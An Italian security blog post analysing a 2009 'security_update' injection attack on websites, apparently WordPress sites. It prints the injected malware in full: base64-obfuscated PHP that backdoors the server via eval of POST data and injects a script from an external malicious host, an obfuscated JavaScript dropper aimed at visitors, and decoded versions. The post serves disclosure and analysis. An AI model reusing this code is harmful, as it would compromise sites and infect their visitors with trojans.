RSS

[HACK] – Cannot redeclare security_update(), alla fine è arrivato!

8 novembre 2009

Sicurezza, Vulnerabilità

CODICI

A distanza di 9 mesi (come un parto) l’attacco porta ancora la firma “security_update” ma questa volta invece che inserire un incomprensibile numero a pié di pagina inietta un virus criptato (HTML Injection) che tenta di far scaricare al visitatore dei Trojan.

Per quanto ho potuto analizzare allo stato attuale vi sono diversi codici che vengono iniettati ma tutti hanno lo stesso scopo.

Di seguito posto tutti i codici individuati con la decodifica.

VERSIONI ENCODATE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

< ?php eval(base64_decode('aWYoIWlzc2V0KCR4dXg1MSkpe2Z1bmN0aW9uIHh1eDUoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2
lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi
88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fH
N0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYX
RjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKC
cjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbG
FjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU
05YUhSMGNEb3ZMeko0YzJGc2RDNXZjbWN2WTNOekwwUkJWaTFVYUc5MVoyaDBMVXhsWVdSbGNuTm9hWEF1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaX
N0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybi
RzO31mdW5jdGlvbiB4dXg1MigkYSwkYiwkYywkZCl7Z2xvYmFsJHh1eDUxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR4dXg1MSkpY2FsbF91c2VyX2Z1bmMoJH
h1eDUxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd4dXg1JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3
poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLS
l7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgneHV4NScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydC
gkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSR4dXg1bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigneHV4NTInKSkhPSd4dXg1MicpPyRhOjA7ZXZhbChiYXNlNjRfZG
Vjb2RlKCRfUE9TVFsnZSddKSk7Pz4=')); ?>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

<script language="javascript">$a="Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;
08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7
tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z252
6M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;
;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;cbZ3dZ2273);Z2573tZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0;i
Z253cdsZ252elZ2565ngtZ2568;Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tf
u7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s
7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h
7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8Z22
;dzZ3dZ22Z2566Z2575Z256ecZ2574Z2569oZ256e dwZ2528t)Z257bZ2563Z2561Z253dZ2527Z252564Z25256fZ252563Z252575mZ2565nZ25257Z2534.Z252577rZ
2569Z252574Z252565(Z25252Z2532Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569Z252570Z2574 Z25256caZ2525Z2536egZ252
5Z25375Z2561Z2567eZ25253dZ25255cZ25252Z2532jaZ2576Z252561Z2573cZ252572iZ252570tZ25255cZ252522Z25253eZ2527;Z2563Z2563Z253dZ2527Z25253
cZ25255cZ25252fscripZ25257Z2534Z25253eZ2527;evaZ256c(unZ2565Z2573caZ2570e(tZ2529)Z257d;Z22;stZ3dZ22Z2573tZ253dZ2522Z2524Z2561Z253dsZ
2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bdZ2563+Z2564Z2564+Z2564Z2565,Z2531Z2530Z2529;Z2564Z2577Z2528Z2573tZ2529;Z2573tZ253dZ2524Z2561
;Z2522Z253bZ22;cdZ3dZ22sZ2574Z252bZ2553triZ256egZ252efrZ256fZ256dChZ2561rCoZ2564eZ2528(tZ256dZ2570Z252eZ256Z22;dcZ3dZ220!9+0yv08tqdu
Z3ewud]Z257F~dx89;!0,0!Z25209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3dZ252070;08tqduZ3ewud]Z257F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;0
7Z3d70;08tqduZ3ewud]Z257F~dx89;!9+myv08tqduZ3ewudTqdu890;!0,0!Z25209kcxyvdY~tuh0-cxyvdY~tuh0;07Z3dZ252070;0tqduZ3ewudTqdu89+mu|cukcx
yvdY~tuh0-0cxyvdY~tuh0;07Z3d70;0tqduZ3ewudTqdu89+mcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKcxyvdY~tuhMKZ2520MZ3eaeubiZ3esxqbSZ257FtuQd8
!9+ve~sdyZ257F~0SZ22;caZ3dZ22Z2566uZ256ectiZ256fn dZ2563s(Z2564sZ252ces)Z257bdsZ253duneZ2573capZ2565(Z2564Z25Z22;czZ3dZ22Z2566uncZ25
74iZ256fnZ2520Z2563z(cZ257a)Z257brZ2565tuZ2572n Z2563Z2561+Z2563b+cZ2563+Z2563d+cZ2565+Z2563zZ253b}Z253bZ22;ceZ3dZ223harZ2543odeZ254
1tZ25280)^Z2528Z25270Z2578Z25300Z2527+eZ2573Z2529));Z257d}Z22;dbZ3dZ229+tqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0#9+0dy}uK7iuqb7M0-0tqduZ
3ewudVe||Iuqb89+dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+dy}uK7tqi7M0-0tqduZ3ewudTqdu89+yv08tqduZ3ewudTqi890--0!0ll0tqduZ3ewudTqi
890--0Z25260ll0tqduZ3ewudTqi890--0$9ktqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0!9+0dy}uK7tqi7M0-0tqduZ3ewudTqdu89+0dy}uK7}Z257F~dx7M0-0tqd
uZ3ewud]Z257F~dx89;!+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+0m0tqduZ3ecudTqdu8tqduZ3ewudTqdu890;Z22;opZ3dZ22Z2524Z2561Z253dZ2522dZ2577
(dZ2563s(cZ2575,14Z2529)Z253bZ2522;Z22;ccZ3dZ22Z2569+Z252b)Z257btmpZ253ddZ2573Z252eZ2573liZ2563eZ2528iZ252ci+Z2531)Z253bsZ2574Z253dZ
22;deZ3dZ22iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0
$90;0~e}9050!Z25209M+}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M
+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+4q-4qZ3ebu`|qsu8tZ3ciuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy
}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;Z69Z66 (dZ6fcZ75Z6deZ6eZ74Z2ecoZ6fZ6bieZ2eZ69nZ64eZ78Z4ff(Z27rZ665Z66Z36dZ73Z27)Z3dZ3d-1)
Z7bfuncZ74Z69on Z63alZ6cbacZ6b(x)Z7b Z77indZ6fZ77.twZ20Z3d Z78;sZ63(Z27rf5fZ36dsZ27,2,Z37);eZ76alZ28uneZ73caZ70e(dZ7aZ2bcZ7aZ2bZ6fp+
sZ74)Z2bZ27dw(Z64z+cZ7aZ28$a+Z73t)Z29;Z27);Z64Z6fcuZ6denZ74.Z77ritZ65($aZ29;}Z64oZ63umZ65nZ74.wZ72Z69Z74e(Z22Z3cimgZ20srZ63Z3dZ27htZ
74p:Z2fZ2fsearZ63h.tZ77Z69tZ74er.Z63omZ2fimagZ65sZ2fsearcZ68Z2frss.Z70nZ67Z27 widZ74hZ3d1 Z68Z65iZ67htZ3d1Z20styZ6ceZ3dZ27visibiliZ7
4y:hZ69ddeZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt lZ61Z6eZ67uaZ67eZ3djavaZ73cZ72iptZ22+Z22 srcZ3dZ27httpZ3aZ2fZ2fsearcZ68.twZ69tteZ72.coZ6dZ2
ftreZ6edZ73Z2fweekZ6cy.jZ73oZ6e?cZ61llbZ61Z63Z6bZ3dcallZ62aZ63k&Z65Z78Z63lZ75deZ3dZ68aZ73htZ61gZ73Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22i
ptZ3eZ22);}elsZ65Z7bZ24aZ3dZ27Z27};functZ69on Z73Z63(cZ6em,vZ2ceZ64)Z7bvaZ72Z20eZ78dZ3dnewZ20DaZ74Z65()Z3bexZ64.sZ65tDZ61te(Z65xdZ2e
getZ44ateZ28)+eZ64);Z64ocZ75Z6dZ65nt.Z63ookZ69eZ3dcnZ6d+ Z27Z3dZ27 Z2beZ73cZ61Z70Z65Z28Z76)Z2bZ27;Z65Z78pZ69Z72Z65sZ3dZ27+exdZ2eZ74o
Z47MTZ53trZ69ngZ28);Z7d;";function z(s){r="";for(i=0;i<s .length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return
unescape(r);}eval(z($a));</script></s></script>

1

<?php ob_start("security_update"); function security_update($buffer){return $buffer."<script language=\"javascript\">$a=\"Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;cbZ3dZ2273);Z2573tZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0;iZ253cdsZ252elZ2565ngtZ2568;Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8Z22;dzZ3dZ22Z2566Z2575Z256ecZ2574Z2569oZ256e dwZ2528t)Z257bZ2563Z2561Z253dZ2527Z252564Z25256fZ252563Z252575mZ2565nZ25257Z2534.Z252577rZ2569Z252574Z252565(Z25252Z2532Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569Z252570Z2574 Z25256caZ2525Z2536egZ2525Z25375Z2561Z2567eZ25253dZ25255cZ25252Z2532jaZ2576Z252561Z2573cZ252572iZ252570tZ25255cZ252522Z25253eZ2527;Z2563Z2563Z253dZ2527Z25253cZ25255cZ25252fscripZ25257Z2534Z25253eZ2527;evaZ256c(unZ2565Z2573caZ2570e(tZ2529)Z257d;Z22;stZ3dZ22Z2573tZ253dZ2522Z2524Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bdZ2563+Z2564Z2564+Z2564Z2565,Z2531Z2530Z2529;Z2564Z2577Z2528Z2573tZ2529;Z2573tZ253dZ2524Z2561;Z2522Z253bZ22;cdZ3dZ22sZ2574Z252bZ2553triZ256egZ252efrZ256fZ256dChZ2561rCoZ2564eZ2528(tZ256dZ2570Z252eZ256Z22;dcZ3dZ220!9+0yv08tqduZ3ewud]Z257F~dx89;!0,0!Z25209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3dZ252070;08tqduZ3ewud]Z257F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3d70;08tqduZ3ewud]Z257F~dx89;!9+myv08tqduZ3ewudTqdu890;!0,0!Z25209kcxyvdY~tuh0-cxyvdY~tuh0;07Z3dZ252070;0tqduZ3ewudTqdu89+mu|cukcxyvdY~tuh0-0cxyvdY~tuh0;07Z3d70;0tqduZ3ewudTqdu89+mcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKcxyvdY~tuhMKZ2520MZ3eaeubiZ3esxqbSZ257FtuQd8!9+ve~sdyZ257F~0SZ22;caZ3dZ22Z2566uZ256ectiZ256fn dZ2563s(Z2564sZ252ces)Z257bdsZ253duneZ2573capZ2565(Z2564Z25Z22;czZ3dZ22Z2566uncZ2574iZ256fnZ2520Z2563z(cZ257a)Z257brZ2565tuZ2572n Z2563Z2561+Z2563b+cZ2563+Z2563d+cZ2565+Z2563zZ253b}Z253bZ22;ceZ3dZ223harZ2543odeZ2541tZ25280)^Z2528Z25270Z2578Z25300Z2527+eZ2573Z2529));Z257d}Z22;dbZ3dZ229+tqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0#9+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+dy}uK7tqi7M0-0tqduZ3ewudTqdu89+yv08tqduZ3ewudTqi890--0!0ll0tqduZ3ewudTqi890--0Z25260ll0tqduZ3ewudTqi890--0$9ktqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0!9+0dy}uK7tqi7M0-0tqduZ3ewudTqdu89+0dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+0m0tqduZ3ecudTqdu8tqduZ3ewudTqdu890;Z22;opZ3dZ22Z2524Z2561Z253dZ2522dZ2577(dZ2563s(cZ2575,14Z2529)Z253bZ2522;Z22;ccZ3dZ22Z2569+Z252b)Z257btmpZ253ddZ2573Z252eZ2573liZ2563eZ2528iZ252ci+Z2531)Z253bsZ2574Z253dZ22;deZ3dZ22iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+4q-4qZ3ebu`|qsu8tZ3ciuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;Z69Z66 (dZ6fcZ75Z6deZ6eZ74Z2ecoZ6fZ6bieZ2eZ69nZ64eZ78Z4ff(Z27rZ665Z66Z36dZ73Z27)Z3dZ3d-1)Z7bfuncZ74Z69on Z63alZ6cbacZ6b(x)Z7b Z77indZ6fZ77.twZ20Z3d Z78;sZ63(Z27rf5fZ36dsZ27,2,Z37);eZ76alZ28uneZ73caZ70e(dZ7aZ2bcZ7aZ2bZ6fp+sZ74)Z2bZ27dw(Z64z+cZ7aZ28$a+Z73t)Z29;Z27);Z64Z6fcuZ6denZ74.Z77ritZ65($aZ29;}Z64oZ63umZ65nZ74.wZ72Z69Z74e(Z22Z3cimgZ20srZ63Z3dZ27htZ74p:Z2fZ2fsearZ63h.tZ77Z69tZ74er.Z63omZ2fimagZ65sZ2fsearcZ68Z2frss.Z70nZ67Z27 widZ74hZ3d1 Z68Z65iZ67htZ3d1Z20styZ6ceZ3dZ27visibiliZ74y:hZ69ddeZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt lZ61Z6eZ67uaZ67eZ3djavaZ73cZ72iptZ22+Z22 srcZ3dZ27httpZ3aZ2fZ2fsearcZ68.twZ69tteZ72.coZ6dZ2ftreZ6edZ73Z2fweekZ6cy.jZ73oZ6e?cZ61llbZ61Z63Z6bZ3dcallZ62aZ63k&Z65Z78Z63lZ75deZ3dZ68aZ73htZ61gZ73Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elsZ65Z7bZ24aZ3dZ27Z27};functZ69on Z73Z63(cZ6em,vZ2ceZ64)Z7bvaZ72Z20eZ78dZ3dnewZ20DaZ74Z65()Z3bexZ64.sZ65tDZ61te(Z65xdZ2egetZ44ateZ28)+eZ64);Z64ocZ75Z6dZ65nt.Z63ookZ69eZ3dcnZ6d+ Z27Z3dZ27 Z2beZ73cZ61Z70Z65Z28Z76)Z2bZ27;Z65Z78pZ69Z72Z65sZ3dZ27+exdZ2eZ74oZ47MTZ53trZ69ngZ28);Z7d;\";function z(s){r=\"\";for(i=0;i<s.length;i++){if(s.charAt(i)==\"Z\"){s1=\"%\"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>";}//important security update

VERSIONE DECODIFICATA

1

if(!isset($xux51)){function xux5($s){if(preg_match_all('#<script (.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovLzJ4c2FsdC5vcmcvY3NzL0RBVi1UaG91Z2h0LUxlYWRlcnNoaXAucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body '))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function xux52($a,$b,$c,$d){global$xux51;$s=array();if(function_exists($xux51))call_user_func($xux51,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='xux5')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('xux5');for($i=0;$i<count ($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$xux5l=(($a=@set_error_handler('xux52'))!='xux52')?$a:0;eval(base64_decode($_POST['e']));?></count></body></script>

LINK MALEVOLO DECODIFICATO

1

<script src=http://2xsalt.org/css/DAV-Thought-Leadership.php ></script>


, , , , , ,

About

Sono un geek di 28 anni, innamorato dell'informatica dall'età di 7. Appassionato del Web, dei linguaggi di programmazione e di sicurezza informatica. Nel 2007 ho creato questo sito per raccogliere tutto ciò che apprendo giorno dopo giorno nel mio lavoro in un It Department.

View all posts by capn3m0

Trackbacks/Pingbacks

  1. Security release di WordPress 2.8.6 | capn3m0.org - WebSecurity - 13 novembre 2009

    [...]Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli attacchi hacker avvenissero grazie a falle presenti in WordPress 2.8.5, rilasciato neanche un mese fa, è stata [...]

Leave a Reply

Stop SOPA